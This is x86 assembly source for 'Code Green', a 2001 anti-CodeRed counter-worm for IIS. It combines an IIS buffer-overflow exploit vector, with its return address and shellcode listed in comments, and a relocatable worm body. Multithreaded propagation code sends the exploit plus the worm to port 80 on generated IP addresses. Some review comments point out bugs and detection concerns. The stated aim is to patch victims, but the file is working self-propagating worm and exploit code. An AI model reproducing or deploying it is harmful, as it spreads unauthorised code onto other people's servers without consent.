; Code Green (AntiCodeRed/IDQPatcher/whatever you want) V1.0 BETA [23.08.2001]
; assemble with:
; ML /Dmasm /c /Cx /coff CodeGreen.asm
; link with:
; LINK CodeGreen.obj /entry:_Entry /subsystem:windows /base:65536
;aims:
; * patch vulnerable systems
; * remove CodeRedII backdoors
;known problems:
; * plenty of probs ... ;(
; * propagation threads will stop (criticalsection), in case only one thread should block while sending
; * don't know if CodeGreen will correctly determine system language
; * don't know if CG will correctly apply patch to all systems
; * don't know if this code would work at all (had not enough time to excessively debug it;()
;known bugs:
; * currently none (inform me if you should find some weak code)
;credits:
; * @eEye: you guys surely did great work finding that bug
; * @MS: thanks for delivering a hotfix that works with system privileges
; (plus: does not show messagebox when executed with system privileges;))
; * @CodeRedI author: thanks for this great exploit vector; good job
; * @CodeRedII author: sorry for providing code/the base for a code
; that will/could potentially take your systems
; * @all: it's my first one ...
; ... so please don't flame me for weak coding ...
; ... be nice guys and send me your modified versions of this code.
;debug instructions:
; * assemble CodeGreen.asm
; (or remove txt-extension from CodeGreen.exe.txt [at your own risk])
; * debug your iis
; * go to 0x7801CBD3h (call ebx)
; * set breakpoint there
; * execute betaversion and walk through the code
; * be sure to stay offline, especially when using the preassembled version
;DISCLAIMER:
; (blahblah) ... i will not take responsibility for any bugs in this code
;(THIS IS ONLY A BETA VERSION, WHICH HAS BUGS IN IT).
;in fact i will not take responsibility for this code/included files at all.
;if you use this code or the pre-assembled version, you should know what you are doing.
;hell ... if you can't keep the code on your local iis, it's your fault.
;(i really don't know if this code is working at all
; ... currently it's 10:20 a.m. in germany and it's getting pretty late ...
; ... but tomorrow i will be on vacation and perhaps there might be someone out there,
; who could finish my work.)
;sidenote: i did not have the time to optimize the code and to
; write some nice comments; sorry.
; --- Assembler setup: 32-bit instruction set, flat memory model, stdcall
; --- calling convention (callee cleans the stack), case-sensitive symbols.
.386
.model flat, stdcall
option casemap:none
; ***** ***** Includes ***** *****
include windows.inc
include kernel32.inc
include advapi32.inc
include wsock32.inc
includelib kernel32.lib
includelib advapi32.lib
includelib wsock32.lib
; Sizes are resolved at assemble time from labels. CGBegin is set right before
; _CGEntry below; CGEnd, UDataBegin and UDataEnd are defined outside this view.
CGLen EQU CGEnd - CGBegin ;bytes of the relocatable worm body (_CGEntry .. CGEnd)
CGInitLen EQU CGEnd - CGInit ;bytes from the host-side init code through the end of the worm body
UDataLen EQU UDataEnd - UDataBegin ;size of an uninitialised-data area defined outside this view
.Code
CGInit EQU $ ;start of the region that _Entry marks PAGE_EXECUTE_READWRITE
;-----------------------------------------------------------------------
; _Entry: entry point of the host executable (LINK /entry:_Entry above).
; 1. Obtains its own address with a call/pop, then changes CGInitLen bytes
;    of its own image to PAGE_EXECUTE_READWRITE. A process re-protecting its
;    own image RWX is a W^X violation and a behaviour endpoint monitoring
;    commonly flags; it is the first observable action of this binary.
; 2. Loads msvcrt.dll and keeps a hard-coded offset into it in esi.
; Both failure paths execute INT 3 and return: debug traps, not error
; handling (the GetLastError result is never consumed).
; Control falls through into _CGInit.
;-----------------------------------------------------------------------
_Entry:
.Data
OldProtection DD 0 ;receives the previous protection from VirtualProtect
.Code
call AdjustCodeSegment
AdjustCodeSegment:
pop ebp ;ebp = address of AdjustCodeSegment, i.e. 5 bytes past CGInit (the call itself)
mov eax, CGInitLen
invoke VirtualProtect, ebp, eax, PAGE_EXECUTE_READWRITE, offset OldProtection ;range starts 5 bytes late; page rounding presumably absorbs it
cmp eax, TRUE
je _Prologue2
INT 3 ;debug trap when VirtualProtect fails
call GetLastError
ret
_Prologue2:
.Data
msvcrt_dll DB "msvcrt.dll", 0
.Code
invoke LoadLibrary, offset msvcrt_dll
mov esi, eax ;esi -> msvcrt.dll
add esi, 00050824h ;hard-coded offset into msvcrt.dll; presumably ties this build to one DLL version; esi is not used by the visible code
cmp eax, NULL
jne _DEBUG ;_CGEntry (success path: LoadLibrary returned a module handle)
INT 3 ;debug trap when LoadLibrary fails
call GetLastError
ret
_DEBUG:
call LaengeCodeGreenCodeBerechnen ;writes CGLen as ASCII digits; called a second time in _CGInit
;-----------------------------------------------------------------------
; _CGInit: static data used by the host-side initialisation, then the jump
; into the ProcTable / propagation setup. CGInit_* symbols live in this
; host image only; the relocatable worm body starts at CGBegin below.
;-----------------------------------------------------------------------
_CGInit:
.Data
CGInit_WSAData DW 0 ;buffer for WSAStartup; looks laid out like WSADATA (two version words, two text fields, ...) - confirm
DW 0
DB 257 DUP (0)
DB 257 DUP (0)
DW 0
DW 0
DD 0
CGInit_CurrentIP DD 7F000001h ;127.0.0.1 (loopback); a different symbol from CurrentIP used further down
CGInit_IoctlSocket_Arg DD 0
CGInit_SockAddr DW 0 ;16 bytes, sockaddr_in-sized: family, port, address, 8 bytes padding
DW 0
DD 0
DD 2 DUP (0)
CGInit_fd_set DD 1 ;fd_set-shaped: count, then 64 socket slots (first one preset to 1)
DD 1
DD 63 DUP (0)
.Data?
CGInit_CGCodeLen DD 0 ;Code
CGInit_CGLen DD 0 ;Exploit+Code
CGInit_NewCodeGreen DB 6000 DUP (?) ;not referenced by the visible code; the outgoing copy is built on the stack instead
.Code
call LaengeCodeGreenCodeBerechnen ;second call with the same constant input; repeats the work done in _DEBUG
xor ebp, ebp ;set initial base-pointer: ebp=0, so [ebp][Var] is Var's absolute address inside this image
jmp CGInit_Get_Used_PropagationThreadFunctions
;-----------------------------------------------------------------------
; LaengeCodeGreenCodeBerechnen ("compute Code Green code length")
; Stores CGLen in CGInit_CGCodeLen and writes CGLen as four zero-padded
; ASCII decimal digits to CodeGreenExploitLenStr (defined outside this view).
; In:    nothing; reads the assemble-time constant CGLen
; Out:   memory only; all general registers restored by pushad/popad
; Clobb: flags
; Note:  four digits cover values below 10000 only; a larger CGLen would
;        leave a non-digit character in the first position.
;-----------------------------------------------------------------------
LaengeCodeGreenCodeBerechnen:
pushad
mov eax, CGLen
mov [CGInit_CGCodeLen], eax
lea esi, CodeGreenExploitLenStr ;absolute address; ebp is not relied upon here
xor edx, edx ;clear edx before each unsigned divide
mov ecx, 1000
div ecx ;edx:eax / ecx -> quotient eax, remainder edx
add eax, 48 ;'0' + thousands digit
mov [esi], al
mov eax, edx
xor edx, edx
mov ecx, 100
div ecx
add eax, 48 ;'0' + hundreds digit
mov [esi+1], al
mov eax, edx
xor edx, edx
mov ecx, 10
div ecx
add eax, 48 ;'0' + tens digit
mov [esi+2], al
mov eax, edx
add eax, 48 ;'0' + ones digit
mov [esi+3], al
popad
ret
;-----------------------------------------------------------------------
; CGInit_Get_Used_PropagationThreadFunctions
; Copies the resolved addresses of ten imported APIs into ProcTable
; (ProcTable and the API_* slot offsets are defined outside this view).
; Each triple appears to walk the import thunk: `mov eax, Name` takes the
; address of the linker-generated stub, [eax+2] its operand (presumably the
; IAT slot of a `jmp dword ptr [...]`), and [eax] the live function pointer.
; The stored pointers are process-absolute, so code that carries this table
; to another process presumably depends on identical DLL load addresses
; there. ebp is 0 in this section (zeroed before the jump here).
;-----------------------------------------------------------------------
CGInit_Get_Used_PropagationThreadFunctions:
mov eax, EnterCriticalSection ;eax -> import stub
mov eax, [eax+2] ;eax -> IAT slot (assumed)
mov eax, [eax] ;eax = resolved function address
mov [ebp][ProcTable+API_EnterCriticalSection], eax
mov eax, LeaveCriticalSection
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_LeaveCriticalSection], eax
mov eax, socket
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_socket], eax
mov eax, ioctlsocket
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_ioctlsocket], eax
mov eax, connect
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_connect], eax
mov eax, select
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_select], eax
mov eax, send
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_send], eax
mov eax, closesocket
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_closesocket], eax
mov eax, GetSystemTime
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_GetSystemTime], eax
mov eax, Sleep
mov eax, [eax+2]
mov eax, [eax]
mov [ebp][ProcTable+API_Sleep], eax ;falls through into CGInit_BuildCodeGreen
;-----------------------------------------------------------------------
; CGInit_BuildCodeGreen
; Assembles the outgoing buffer on the main thread's stack:
;   [ptrNewCodeGreen]     = number of dwords reserved (ebx)
;   [ptrNewCodeGreen+4..] = CodeGreenExploit bytes, then the worm body
;                           starting at _CGEntry (CGLen bytes)
; The reserved area is (len/4 + 1) dwords pre-filled with 90h, so it holds
; at least CGExploitLen + CGLen bytes. esp is never restored in the visible
; code, so the buffer stays valid only because this thread never returns.
; Note: executable bytes staged on the stack - a layout that DEP-enabled
; hosts reject. CodeGreenExploit, CGExploitLen and ptrNewCodeGreen are
; defined outside this view.
;-----------------------------------------------------------------------
CGInit_BuildCodeGreen:
lea esi, [ebp][CodeGreenExploit]
mov eax, CGExploitLen + CGLen
mov ecx, eax
shr ecx, 2 ;div 4
inc ecx ;round up to whole dwords
mov ebx, ecx ;ebx: NrOfPushs
CGInit_ReserveStackLoop:
push 090909090h ;filler dword
loop CGInit_ReserveStackLoop ;legacy `loop`; ecx counts the pushes down
push ebx ;first DW in stack-field holds NrOfPushs
mov [ebp][ptrNewCodeGreen], esp
CGInit_CopyCodeGreenExploit:
mov ecx, CGExploitLen ;eax
lea edi, [esp+4] ;destination starts right after the count dword
cld
rep movsb
CGInit_AddCodeGreenCode:
lea esi, [ebp][_CGEntry]
mov ecx, CGLen
rep movsb ;edi continues where the previous copy ended
;-----------------------------------------------------------------------
; CGInit_StartPropagation .. CGInit_Main_WaitLoop
; Resets the shared counters, initialises Winsock 1.1, starts one
; RandomGenerator thread and two critical sections, then spawns a
; _ThreadFunction thread every 100 ms until NrOfThreads reaches
; MAX_NR_OF_THREADS, and finally loops forever, zeroing CurrentIP under
; CritSec_GetIP once a minute. This thread never returns.
; Review notes:
;  - RandomGenerator is started before either critical section is
;    initialised; if it uses CritSec_GetIP that is a race.
;  - WSAStartup's return value is not checked.
;  - the HANDLE returned by each CreateThread is overwritten by the
;    following `pop eax`, so thread handles leak in the visible code.
;  - NrOfThreads is only zeroed and compared here; unless _ThreadFunction
;    (outside this view) increments it, the spawn loop never ends.
;  - `jl` is a signed compare; harmless only while MAX_NR_OF_THREADS
;    stays below 32768.
; NrOfThreads, EndThreadsFlag, CurrentIP, RandomGenerator, CritSec_*,
; _ThreadFunction and MAX_NR_OF_THREADS are defined outside this view.
; CreateThread argument order (stdcall, pushed right to left):
;   lpThreadId -> the pushed 0 slot, dwCreationFlags=0, lpParameter=ebp,
;   lpStartAddress=eax, dwStackSize=0, lpThreadAttributes=0.
;-----------------------------------------------------------------------
CGInit_StartPropagation:
mov [ebp][NrOfThreads], word ptr 0
mov [ebp][EndThreadsFlag], byte ptr 0
mov [ebp][CurrentIP], dword ptr 7F000000h ;does propagation thread only send one copy to the local IIS?
;7FFFFFFDh ;=127.255.255.254 => no random IP generation, hits local Port 80 1 time
CGInit_InitializeSockets:
push offset CGInit_WSAData ;absolute offset (ebp is 0 here, so equivalent to [ebp][...])
push 0101h ;Winsock version 1.1
CALL WSAStartup ;return value ignored
CGInit_Main_StartRandomGenerator:
push 0 ;slot that receives the thread id
push esp ;lpThreadId -> that slot
push 0 ;dwCreationFlags
push ebp ;lpParameter = base pointer
lea eax, [ebp][RandomGenerator]
push eax ;lpStartAddress
push 0 ;dwStackSize
push 0 ;lpThreadAttributes
CALL CreateThread
pop eax ;discard the id slot; the thread HANDLE in eax is lost here
CGInit_Initialise_Critical_Sections:
lea eax, [ebp][CritSec_GetIP]
push eax
CALL InitializeCriticalSection
lea eax, [ebp][CritSec_SendCG]
push eax
CALL InitializeCriticalSection
CGInit_Propagation_ThreadLoop:
push 0 ;slot that receives the thread id
push esp ;lpThreadId
push 0 ;dwCreationFlags
push ebp ;lpParameter = base pointer
lea eax, [ebp][_ThreadFunction]
push eax ;lpStartAddress
push 0 ;dwStackSize
push 0 ;lpThreadAttributes
CALL CreateThread
pop eax ;discard the id slot; HANDLE lost
push 100
CALL Sleep ;100 ms between thread starts
cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS
jl CGInit_Propagation_ThreadLoop ;signed compare on a 16-bit count
CGInit_ResetPropagation:
CGInit_Main_WaitLoop:
push 60000 ;60 secs
CALL Sleep
CGInit_Main_StartRandomIPSearchAgain:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
CALL EnterCriticalSection
mov [ebp][CurrentIP], dword ptr 0 ;reset shared target state while holding CritSec_GetIP
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
CALL LeaveCriticalSection
jmp CGInit_Main_WaitLoop ;never exits
;*********************************************************************************************************************************
;************************************************ EXPLOIT VECTOR *************************************************************
;*********************************************************************************************************************************
;esp: 7801CBD3h; [7801CBD3]: FF 29 call ebx
; ->00D3F0E8 90 nop
; 00D3F0E9 90 nop
; 00D3F0EA 58 ! pop eax
; 00D3F0EB 68 D3 CB 01 78 ! push 7801CBD3h
; 00D3F0F0 90 nop
; 00D3F0F1 90 nop
; 00D3F0F2 90 nop
; 00D3F0F3 90 nop
; 00D3F0F4 90 nop
; 00D3F0F5 81 C3 00 03 00 00 add ebx,300h
; 00D3F0FB 8B 1B mov ebx,dword ptr [ebx]
; 00D3F0FD 53 ! push ebx (ebx: 00B02698h)
; 00D3F0FE FF 53 78 ! call dword ptr [ebx+78h] pushes 00D3F100h
;Stack:
; [esp]: 00D3F100h, 00B02698h(esp+4), 7801CBD3h(esp+8)
;*********************************************************************************************************************************
;************************************************** WORM CODE ****************************************************************
;*********************************************************************************************************************************
CGBegin EQU $
_CGEntry:
call _GetEIP
_GetEIP:
;00011000 E8 00 00 00 00 call 00011005
;00011005 5D pop ebp ;ebp > 00011005 z.B. ebp=00401005
;00011006 B8 06 10 01 00 mov eax,11006h
;0001100B 48 dec eax ;eax=11005 (STATISCH!)
;0001100C 55 push ebp
;0001100D 2B E8 sub ebp,eax ;ebp = ebp - eax => Variablenangleichung m鰃lich!
;0001100F 58 pop eax
;00011010 83 E8 05 sub eax,5 ;eax -> _Entry => wir haben komfortablen Zeiger auf den VirenCode!
pop ebp
mov eax, $
dec eax ;eax=11005 (STATISCH!); d.h.: eax zeigt auf "pop ebp"
push ebp
sub ebp, eax ;ebp -> (_CGEntry - eax); d.h.: ebp + offset VAR = EffectiveAddressOf Var
pop eax
sub eax, 5 ;eax -> _CGEntry (VARIABEL!)
;mov [ebp][BasePointerCode], eax
push ebp ;Push the BasePointer to stack
;**********************************************************************************
;*** init ***
;**********************************************************************************
_GetMsvcrtBaseAndSearchGetProcAddrEntry:
mov esi, 78000000h ;[esp+12] ;esi: 7801CBD3h (see above)
;call SearchMZHeader
lea ebx, [ebp][Str_GetProcAddr]
mov ecx, Len_GetProcAddr
mov ebp, dword ptr esi
mov esi, dword ptr [esi+3Ch]
add esi, ebp
mov esi, dword ptr [esi+80h] ;78h=ExportTable 80h=ImportTable
add esi, ebp
mov edi, esi ;edi -> ImageImportTable
sub edi, 14h
SearchIMAGE_IMPORT_DESCRIPTORs:
add edi, 14h ;edi -> nextImportDescriptor
mov esi, [edi+12] ;esi -> Name
add esi, ebp
mov esi, [esi]
cmp esi, "NREK"
jne SearchIMAGE_IMPORT_DESCRIPTORs
IMAGE_KERNEL_IMPORT_DESCRIPTOR_Found: ;edi -> KernelImportDescriptor
mov esi, [edi+10h] ;esi -> PIMAGE_THUNK_DATA (Address-Table)
add esi, ebp ;[ebp][MsvcrtBase]
mov edi, [edi] ;edi -> IMAGE_IMPORT_BY_NAME - Pointers (Name-Table)
add edi, ebp ;[ebp][MsvcrtBase]
xchg ebx, esi ;ebx=esi; esi -> Str_GetProcAddr
xor edx, edx ;edx : Z鋒ler
cld
SearchPointerTableLoop:
inc edx
pushad
add [esp], dword ptr 4 ;"add edi, 4" after "popad"
mov edi, [edi]
add edi, ebp
add edi, 2 ;edi -> ProcName ;shl edi ...
CompareTheTwoNames:
repe cmpsb
popad
jnz SearchPointerTableLoop ;the strings are not equal
FunctionFound: ;edx: NrIn_IMPORT_TABLE
dec edx
shl edx, 2 ;edx=edx*4
add ebx, edx
mov edx, [ebx] ;EDX: GetProcAddr
pop ebp
mov [ebp][ProcTable+API_GetProcAddr], edx
mov esi, edx
call SearchMZHeader ;esi -> KernelBase
lea edi, [ebp][DllTable]
push edi
mov [edi], esi